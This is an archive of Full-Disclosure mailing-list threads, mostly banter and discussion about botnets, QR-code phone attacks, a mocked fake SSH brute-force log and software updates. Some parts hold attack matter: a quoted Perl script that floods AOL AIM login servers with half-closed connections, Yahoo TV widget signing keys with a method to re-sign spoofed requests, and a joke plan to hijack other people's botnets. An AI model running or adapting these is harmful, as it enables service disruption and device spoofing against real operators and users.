Re: [Full-disclosure] understanding the botnet CC..
There were some trojans back in the day that would imitate normal browsing (proxying cnn.com for instance) and it'd stuff a encrypted command packets in there. Combine that with a load balancing check-back time in the response, you can probably support a very large number of bots on a single webserver. -Travis On Sat, Sep 17, 2011 at 8:10 PM, Corey Nachreiner corey.nachrei...@watchguard.com wrote: This basic video series may help: http://www.watchguard.com/tips-resources/video-tutorials/botnets-part-one.asp http://www.watchguard.com/tips-resources/video-tutorials/botnets-part-two.asp http://www.watchguard.com/tips-resources/video-tutorials/botnets-part-three.asp http://www.watchguard.com/tips-resources/video-tutorials/botnet-source-code-for-overachievers.asp That said, we made that ages ago. It is quite dated. Most modern botnets have started to use HTTP CC channels, often encrypted. They also sometimes obfuscate their CC via proxies and p2p. Leaked source code for Zues and spyeye probably would provide a better idea of how modern botnets work. Cheers, Corey Nachreiner, CISSP | Senior Network Security Strategist WatchGuard Technologies, Inc. | www.watchguard.com 206.613-0873 Direct 206.227.6905 Mobile corey.nachrei...@watchguard.com Office Hours: 9:15 AM to 6:15 PM Pacific (GMT-8), Mon - Fri Better be despised for too anxious apprehensions, than ruined by too confident security. - Edmund Burke . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . WatchGuard: Stronger Security, Simply Done -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto: full-disclosure-boun...@lists.grok.org.uk] On Behalf Of RandallM Sent: Friday, September 16, 2011 8:38 AM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] understanding the botnet CC.. hi an area that I am basically stupid on is botnets. Not what they are but how they work through IRC as the control center. Not just that but the various modern programs used. I am aware for instance LOIC can be used to connect to an IRC channel.. but, how then does the herder do the job from IRC..how does he issue commands that all the computers connected act upon, etc. ? My curiosity has just got the best of me and I would like some pointers to good material that can feed it. Sorry for the troll like post but I really would like to understand this further. Have done a number of Google searching but have hope someone here has done personal research. -- been great, thanks RandyM a.k.a System ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Using QR tags to Attack SmartPhones (Attaging)
I like the idea of advertising a 'free * for your phone' around interesting targets, perhaps posting fake adverts in the DC subway system? I think people will trust print more than web and jump at the opportunity to scan and install anything. -Travis On Sun, Sep 11, 2011 at 12:04 AM, Augusto Pereyra aepere...@gmail.comwrote: I'd like to share this paper with all. English version http://kaoticoneutral.blogspot.com/2011/09/using-qr-tags-to-attack-smartphones_10.html Version en español http://kaoticoneutral.blogspot.com/2011/09/using-qr-tags-to-attack-smartphones.html Thanks to all ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Twitter https://twitter.com/#%21/tbiehn | LinkedInhttp://www.linkedin.com/in/travisbiehn| TravisBiehn.com http://www.travisbiehn.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Security Tool - Video] INSECT Pro 2.6.1 available
Maybe he should build a vulnerability into each version, so he can announce each new version with the disclosure and satisfy your constraints. -Travis On Wed, Aug 10, 2011 at 10:44 AM, Steven Pinkham steve.pink...@gmail.comwrote: valdis.kletni...@vt.edu wrote: On Tue, 02 Aug 2011 22:17:58 -0300, root said: Dude you just released INSECT Pro 2.7 less than a week ago. I swear to god I'm being serious. It's not unusual for commercial products with customers that demand product stability to release version 3.5 or whatever, then release 3.6, and after that release 3.5.1, 3.5.2, yadda yadda with just bugfixes so sites can get patched without having to make the 3.5-3.6 jump. Yes. But they don't spam full-disclosure with that info every week. Rapid releases can be good, but the list charter says: Gratuitous advertisement, product placement, or self-promotion is forbidden. Announcing every point release of a commercial product falls afoul of that. -- | Steven Pinkham, Security Consultant| | http://www.mavensecurity.com | | GPG public key ID CD31CAFB | ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] new anon tool
nothing. On Wed, Aug 3, 2011 at 5:08 PM, RandallM randa...@fidmail.com wrote: have you heard much about the #RefRef tool? What so unique and hasnt been done or triedd before? -- been great, thanks ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] (fractal-Self__) : A theoretical introduction to Universe, Conscious Machines and Programming Ur-cells !!!
tl;dr ACID IS A LOT OF FUN AMIRITE? -TRAVIS On Sun, Jun 12, 2011 at 8:36 PM, Christian Sciberras uuf6...@gmail.comwrote: Fractal fractal fractal, even us that coined the concept can't keep it going forever. Seems evident that each subsystem looses key aspects of its parent, this might turn out to be a system flaw, or a constrained space. We might have discovered this flaw already and we might have been using all this time since nothing tells us the laws of our universe are true to its container (if at all). Chris. On Sun, Jun 12, 2011 at 10:13 PM, Michal Zalewski lcam...@coredump.cxwrote: Paradox are way of life... Hence, the goal here is to question every knowledge with reasoning and trying-not to build a static opinion on anything. But have you tried contacting the vendor first? /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] LulzSec EXPOSED!
LOL @
A timing attack on ssh passwords over the net?
and
I think its just a bruteforce.
-Travis
On Mon, Jun 6, 2011 at 7:58 AM, Gichuki John Chuksjonia
chuksjo...@gmail.com wrote:
I think its just a bruteforce.
On 6/6/11, Andreas Bogk andr...@andreas.org wrote:
Excerpts from lulzfail's message of Mo Jun 06 08:39:42 +0200 2011:
Lulzsec == pwnt
I've seen the log you pasted to pastebin. Is this:
* A timing attack on ssh passwords over the net?
* Fake, to distract us from your real 0day?
Andreas
Log:
root@gibson:~# ./1337hax0r 204.188.219.88 -root
Attempting too hax0r root password on 204.188.219.88
h,VhXzavMm
3xLl1-_\wC
ffsakTgyc~H
ZZrz,pJrgB
b{4Bv_Y$$Z6
XDh;vDU-;3
FB-hvg%g_'t
}qHNvkS'g
RNBKvUi5yO|
z`(}v1^u
*V4?vh9#^f2
/R*9vfhZ#
9P65vjKhh.N
\rfsv~PhNDz
Bfpv|uhGpy
J%kvf]hGf0
sY0v{2hf7p
9dev%Qh6_v
*Tbv7?h.**
}:lkvV^hN2U
;5Xv'Sh#}_
MOqpvi_hg+#
Md9/viVhu7
M(%rvomhb'
MI5v_shEVe
M=@?vl.hZge
MPk5v:WhUTe
M=3vvrzh7Te
M'?v]sh`Te
M/Z,vI1h`Te
M.9vO$hTTe
Ms!(vY;hpTe
MA)SvYLhnTe
M7eCv@Lh0Te
MkeCvFLh$Te
M'eCv?LhaTe
MeCvLLh|Te
M*eCv5Lh\Te
MmeCvcLhCTe
MTeCvLhrTe
M,eCv1LhYTe
MEeCv}LhHTe
M_eCvSLhnTe
MPeCvSLh+Te
M[eCvSLh,Te
MOeCvSLhTe
M7eCvSLhTe
MGeCvSLhdTe
M$eCvSLhkTe
MCeCvSLhkTe
MLeCvSLhkTe
M=eCvSLhkTe
M-eCvSLhkTe
MweCvSLhkTe
M=eCvSLhkTe
M3eCvSLhkTe
M6eCvSLhkTe
MreCvSLhkTe
M6eCvSLhkTe
MFeCvSLhkTe
MSeCvSLhkTe
M8eCvSLhkTe
Password hax0rd! root password: M8eCvSLhkTe
root@gibson:~# ssh 204.188.219.88
root@204.188.219.88's password:
root@xyz:~# hostname; id; w
xyz
uid=0(root) gid=0(root) groups=0(root)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
jgichuki at inbox d0t com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] LulzSec EXPOSED!
Will you be presenting at BlackHat? -Travis On Mon, Jun 6, 2011 at 9:57 AM, Benji m...@b3nji.com wrote: (picture found by looking through dir) On Mon, Jun 6, 2011 at 2:54 PM, Andreas Bogk andr...@andreas.org wrote: Excerpts from Benji's message of Mo Jun 06 15:32:11 +0200 2011: http://89.248.164.63/dox/xyz/20.png Ah, that's a much saner explanation. :) Andreas ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Some magic secrets.
Yeah these are Yahoo TV Widget url signing keys for Samsung LG devices, they are used together with a timestamp to prevent you from grabbing other people's widgets/spoofing devices. If you fire up wireshark while you're poking at these TV's you'll see some calls to Yahoo services ending in sign= url = http://yahoo?1=a2=b3=c url = url+sign=md5(url+Secret) Update the ts (timestamp in msecs) parameter, resign, post play. Interesting to look at the various widgets sources, none of them have any form of obfuscation applied to the javascript, could be useful in finding and exploring unknown APIs :) -Travis On Thu, Mar 10, 2011 at 3:18 PM, Ryan Sears rdse...@mtu.edu wrote: Hrm Could this have something to do with this = http://pastebin.com/rD8hwpxT? :-P As far as 'magic secrets' go, either disclose something or don't. Then move on, personally I think posting cryptic messages to a public forum like this is a bit dumb. If you're trying to say something, just say it. Ryan - Original Message - From: T Biehn tbi...@gmail.com To: full-disclosure Full-Disclosure@lists.grok.org.uk Sent: Thursday, March 10, 2011 1:22:50 PM GMT -05:00 US/Canada Eastern Subject: [Full-disclosure] Some magic secrets. SA: R8P6PtAlwn2bQobnedI2g7TxgqL4n091Fcq44nRh6CY- L: qCb_hz5hQVQezObhN.VP8HYkBdubli1el0xDUxDpvrU- SO:? V:? Do the replace live: value key=gallery.gallery-urllocalhost/value Also, First! -Travis -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] psnhack - playstation network hack
I'm pretty sure the ps3dev crowd aren't responsible for any sort of breach of Sony's servers. But, I guess, if you didn't understand what they were talking about you'd see 'hack' and 'psn'. -Travis 2011/5/1 アドリアンヘンドリック unixfreaxj...@gmail.com Dear operators of Full disclosure, Please do not make the below message to be up in the maillist. The link which contains translation text is currently being used by what so called anonymous and they put it in their site. I am really angry and frustrated for it, and erasing the text file in my server now. Sorry for the inconvenience. On Sun, May 1, 2011 at 9:22 PM, ZeroDay.JP unixfreaxj...@gmail.com wrote: Just having some additional info to share regardingly. Sorry for interrupt. In Japan people were very patient to wait for announce from Sony, while in heart worried so much. It was 27th just a day before summer holiday here when the announce came .. I got to hold the phone for 3hours to passed thru to cancell all cards. Today I was watching the whole Sony news conference and writing it in text word by word the took time to translate to english. The reporters here was presenting the user's feelings very well, and I really respect them a lot, they cleverly cornered Mr. Hirai's team with very logical questions. Access for the QA text is here... http://0day.jp/data/PSN.txt I hope this list allowed this message to pass through, for I got a strong sense that maybe I cannot hold the the text uptime for too long. Best regards, --- Hendrik ADRIAN ZeroDay Japan http://0day.jp Twit: @unixfreaxjp, blog: ZeroDay.JP http://unixfreaxjp.blogspot.com Sent to you by ZeroDay.JP via Google Reader: Re: psnhack - playstation network hack via Full Disclosure on 5/1/11 Posted by Peter Osterberg on May 01 In Sweden they did that 14 days after they got hacked, and at the same time informed us that we should pay attention to weird things happening on our bank accounts... LOL, itapos;s fucking lame to come out with that warning 14 days after it happened... Quite obvious that they wanted to bury the whole thing... Thor (Hammer of God) skrev 2011-04-30 19:13: Things you can do from here: Subscribe to Full Disclosure using Google Reader Get started using Google Reader to easily keep up with all your favorite sites ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] password.incleartext.com
I sent this only to Romain, Some other posters wanted to know the other scenarios. -Travis -- Forwarded message -- From: T Biehn tbi...@gmail.com Date: Wed, Apr 6, 2011 at 10:33 AM Subject: Re: [Full-disclosure] password.incleartext.com To: Romain Bourdy achil...@gmail.com The only scheme where there's a semblance of security is if the decryption key was stored in memory only. (Provided on startup perhaps?) Or the server stores a one way hash of the password for verification, then the encrypted version, and queues them up on the X for decryption, an admin grabs the packet and decrypts locally. Neither of those schemes are likely to have been implemented on any site, ever. In which case plain-text is equivalent to encrypted text with an easily recoverable key. -Travis On Wed, Apr 6, 2011 at 10:01 AM, Romain Bourdy achil...@gmail.com wrote: Hi Full-Disclosure, Just my two cents but ... the fact they can give your password back doesn't mean it's stored in cleartext, just that it's not hashed but encrypted with some way to get the original data back, this doesn't mean at all it's not secured, even though in most case it's not. -Romain On Wed, Apr 6, 2011 at 1:36 PM, maksim.file...@fuib.com wrote: Kinda plaintextoffenders.com? wbr, - Max full-disclosure-boun...@lists.grok.org.uk wrote on 01.04.2011 02:17:24: Inc leartext st...@incleartext.com Sent by: full-disclosure-boun...@lists.grok.org.uk 01.04.2011 13:14 To full-disclosure@lists.grok.org.uk cc Subject [Full-disclosure] password.incleartext.com Hi FD, Just launched a new website to keep a list of websites storing passwords in clear text, so far the database is small but feel free to add some: http://password.incleartext.com/ Cheers, Inc Leartext___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Some magic secrets.
SA: R8P6PtAlwn2bQobnedI2g7TxgqL4n091Fcq44nRh6CY- L: qCb_hz5hQVQezObhN.VP8HYkBdubli1el0xDUxDpvrU- SO:? V:? Do the replace live: value key=gallery.gallery-urllocalhost/value Also, First! -Travis -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Anyone on list have a Samsung TV w/ Yahoo TV Widgets?
Working on something, I'm wondering about a few settings on Sammy's vs LG tvs for YTV. Shoot me an e-mail if you're interested! -Travis -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DOS AOL AIM via perl
You need at minimum 2x the number of IPs your target has to take it down.
Via proxies, bots, whatever.
Targets can implement per IP throttling/blacklisting. Which means you need
more than IPs than that.
IIRC Aol throttles connection attempts.
-Travis
On Tue, Dec 14, 2010 at 10:13 AM, Cyber Flash cyber_fl...@hotmail.comwrote:
Create many ESTABLISHED connections (60,000) to login.oscar.aol.comserver
and then temporarily disable the local client gateway, close the sockets
(the RST packets aren’t sent to AOL), reopen the gateway and repeat this
process.
Anyone have ideas on the pros/cons of using this technique?
# Client - Server [SYN]
# Server - Client [SYN, ACK]
# Client - Server [ACK]
# Server - Client 10 bytes (conn_ack)
# Client - Server 10 bytes (conn_ack)
# Server - Client [ACK]
use IO::Socket;
use Thread;
use Win32::OLE qw(in);
# --- SCRIPT CONFIGURATION ---
my $host=login.oscar.aol.com;
my $port=80;
# --- END CONFIGURATION ---
my $ip=;
my $gateway=;
my $fake_gateway=1.1.1.1;
my $mask=;
my $adpater=;
my $alive=0;
$object=Win32::OLE-GetObject('winmgmts:{impersonationLevel=impersonate}!//.');
foreach my
$nic(in$object-InstancesOf('Win32_NetworkAdapterConfiguration')){
next unless $nic-{IPEnabled};
$...@{$nic-{IPAddress}}[0];
$gatew...@{$nic-{DefaultIPGateway}}[0];
$ma...@{$nic-{IPSubnet}}[0];
print IPv4 Address: $ip\nDefault Gateway: $gateway\nSubnet Mask:
$mask\n;
last;
}
$objWMI = Win32::OLE-GetObject(winmgmts://./root/cimv2);
$colNAs = $objWMI-InstancesOf('Win32_NetworkAdapter');
foreach my $objNA (in $colNAs){
next unless $objNA-{NetEnabled};
$adapter=$objNA-NetConnectionID;
print Ethernet Adapter: $adapter\n;
last;
}
while (1) {
for ($n=0;$n=3000;$n++){
$thr=new Thread\connect;
$thr-detach;
$t++;
print Connection: $t\n;
select(undef, undef, undef, 0.25);
}
print \nDisabling Gateway...\n;
system(netsh interface ip set address name=\$adapter\ static $ip
$mask $fake_gateway 1);
$alive=1;
sleep 3;
print \nEnabling Gateway\n;
system(netsh interface ip set address name=\$adapter\ static $ip
$mask $gateway 1);
$alive=0;
}
sub connect{
my $socket =
IO::Socket::INET-new(Proto=tcp,PeerAddr=$host,PeerPort=$port);
$socket-recv($data,10);
$socket-send($data);
while ($alive==0) {sleep 1;}
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Evilgrade 2.0 - the update explotation framework is back
a+ troll. -Travis On Sun, Oct 31, 2010 at 9:24 AM, Christian Sciberras uuf6...@gmail.comwrote: Only thing, there's the danger of someone using stolen certificates. But I'm sure there's another fix for that. In my opinion, all in all, you're creating a yet another overly complex system with as yet more possible flaws. Don't forget tat each new line of code is a potential attack vector which affects any system. Just my 2 cents... Chris. On Sun, Oct 31, 2010 at 1:09 PM, Mario Vilas mvi...@gmail.com wrote: Just signing the update packages prevents this attack, so it's not that hard to fix. On Sat, Oct 30, 2010 at 5:02 PM, valdis.kletni...@vt.edu wrote: On Sat, 30 Oct 2010 04:43:14 +0800, Jacky Jack said: It's now a time for vendors to re-consider their updating scheme. And do what differently, exactly? OK, so it's *possible* to fake out the iTunes update process. But which is easier and more productive: A) Laying in wait for some random to think Wow, I should update iTunes and hijack the process. B) Send out a few hundred thousand spam with a ' From:upd...@apple-itunes-support.comfrom%3aupd...@apple-itunes-support.com ' with a link to a site you control and feed the the sheep some malware. Evilgrade looks like a nice tool to have if you're doing a pen test or a targeted attack and can somehow get the victim to do an update (possibly social engineering), but for any software vendor feeding software updates to Joe Sixpack this threat model is *so* far down the list it isn't funny. Simply compare the number of boxes pwned by (A) and (B) - how many people have gotten pwned because somebody hijacked their update from Symantec or wherever, compared to the number pwned because they got a popup that said Your computer is infected, click here to fix it? Remember - just because a new tool useful for an attacker shows up, does *not* mean it's a game changer for the industry at large. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- HONEY: I want to… put some powder on my nose. GEORGE: Martha, won’t you show her where we keep the euphemism? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DLL hijacking POC (failed, see for yourself)
Shit man, I was keeping notes for my class in pedantry, can't you two keep it going for a few more days? -Travis On Wed, Sep 15, 2010 at 7:19 PM, Stefan Kanthak stefan.kant...@nexgo.dewrote: Christian Sciberras wrote: Yes. Once again: get your homework done! http://www.codeproject.com/KB/DLL/dynamicdllloading.aspx That's a double DYNAMIC there! Did you even bother to read the article? The very first paragraph states the difference between the two. Oh, and for the records, you can't statically link to dll files. At least, not in the way you're imagining. You should start to read what I wrote in 34a088424c7d499f988d1adca645b...@localhost: | Static linking occurs when the linker builds a binary (this might be a | DLL.-) using *.OBJ and *.LIB. Static linking (in your case) only works for object files (.o or .lib). I wrote that already. Why should I bother to do the work of the loader? I reference the DLL export in my code and expect the loader to resolve it. There is no need for fancy do-it-yourself DLL entry resolution! Forfuckssake where did this point come from? Your completely superfluous trip to codeproject.com! Nobody can load a DLL that does not exist! Wow what genius! The hell with that. It's the practice that is wrong. As the saying goes, one shouldn't cry over spilled milk; attempting to load a non-existent is asking for trouble. Oh, and by the way. Looks like MS just broke your little fact... ...they've been loading an nonexistent dll via ACROS' POC (via wab.exe). Bloody wrong: the .DLL accompanies the *.VCF in the share. Why should I call or even write a routine which checks whether a DLL exists instead of just calling the loader and let it search/load it? Hint #1: this is exactly what MSFT advices NOT to do! And they are right. You shouldn't be doing the OS's work. Hint #2: loading a DLL does not mean to run any code from this DLL! But it is still loading the library into memory. That's what I expect when loading a DLL. From there on, perhaps, some buffer overflow exploit would escalate the issue. Which issue? Ever heard of Occams Razor?! At which point we all go critical over the damn crap just like you're doing right now. Why? You wrote that your self-written POC failed! ACROS' POC but works. Who's wrong? Who guarantees that your self-written or the OS supplied search routine will find the same DLL as the loader (just in case you do not use the fully qualified pathname of the DLL)? Because that is the damn point of the function, to tell us what the hell the loader is doing!! Which function then tells me what your function is doing? LoadLibrary*() IS documented, and its rather well documented. There's no need to reprogram it. Just use it. And check its return code! Why should someone with a sane mind let a program (or the OS) search a DLL twice? Just to waste performance? Why search? A simple CreateFile() (aka FileExists in winapi) over the cached path would suffice. Which cached path? KISS! Remember: for DLL hijacking to work the input to LoadLibrary() needs to be a simple filename or a relative pathname. Perhaps returning this cached path would completely solve the issue. Perhaps. The Win32 API but does not provide such a function! For DLLs: always. For EXEs: it depends. Just read it in the MSDN! Just in case that you misunderstood from the very beginning let me rephrase it: from the earliest days of DOS/Windows CWD was in the PATH. That is NOT true. OF COURSE THIS IS TRUE! I don't know if it was, perhaps in the Win95 era, but it most certainly is not there today. %PATH% is ALWAYS equivalent to .;%PATH% That was what my POC proved. Did you read the full article? I mentioned cases where the bad dll (in CWD) would not be loaded (and an error followed instead). Consult MSDN on the DLL load order. I don't have to. If you spared one moment from trolling, you might have noticed me dumping a list from ProcessMonitor...which clearly shows what the dll loading order is. BTW: Windows' base directory is MSFTs notion of $HOME. Use the right terms/words, PLEASE. Mind not putting words in my mouth? As far as definition goes, a base directory is where the source program started from... Wrong. That's the application directory. that could be a docroot of an index.php file Wrong again. *.PHP is no executable file format, but associated to an application. See CMD.EXE /K ASSOC .PHP and then FTYPE with the output of the ASSOC. or C:\Windows for notepad.exe. No one said anything about Windows! ACROS showed a POC for Windows' address book using a *.VCF and a .DLL built for Windows. Can I assume that you tested it just like you failed to test your own POC? SAFER works quite well here (and there too) for about 7 years now. Tell THAT to ACROS and their POC! Why should I care for existence of a
Re: [Full-disclosure] Virus submission site
You could setup a website that proxies submissions to virustotal, anubis (so it's from the future) and retain the executables. Post this website to FD. You could also deploy a botnet of your own and use them as honeypots then jack the networks of the lower tier *ircbot fellows to expand your 'honeypot' network. A good place to start building your whitehat use honeypot/botnet is scraping dronebl, spambl and IP addresses posted to the IRC-Security mailing list. (Archive helpfully provided for registered users.) Once you have a sizable network set up you can start baiting scammers by offering various services like selling proxy servers, providing bulletproof hosting and spamming. You can use this supplemental income to quit your day job and become a full-time vigilante whitehat. Eventually you'll build a nice portfolio of clients, if any of them becomes competitive you can just report their information to the appropriate authorities, this would also be a nice side-channel of income to enable further whitehat pursuits and make sure you stay firmly in the man's good books. -Travis On Fri, Sep 3, 2010 at 12:25 PM, IndianZ indi...@indianz.ch wrote: http://www.offensivecomputing.net/ - not very structured, but actual stuff - registration required Cheerz IndianZ On 09/03/10 16:58, Christian Sciberras wrote: Wish there was a reverse for thatI'm kinda getting tired of running honeypots to get a hopefully recent malware. vx-heavens has a nice (but outdated) list. Anyone knows about others? Cheers, Chris. On Fri, Sep 3, 2010 at 4:48 PM, Hacxx 20 hacx...@gmail.com wrote: Hi, Do you have virus archived? Submit them to all major antivirus companies. Visit http://virus-submission.tk ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows XP bug
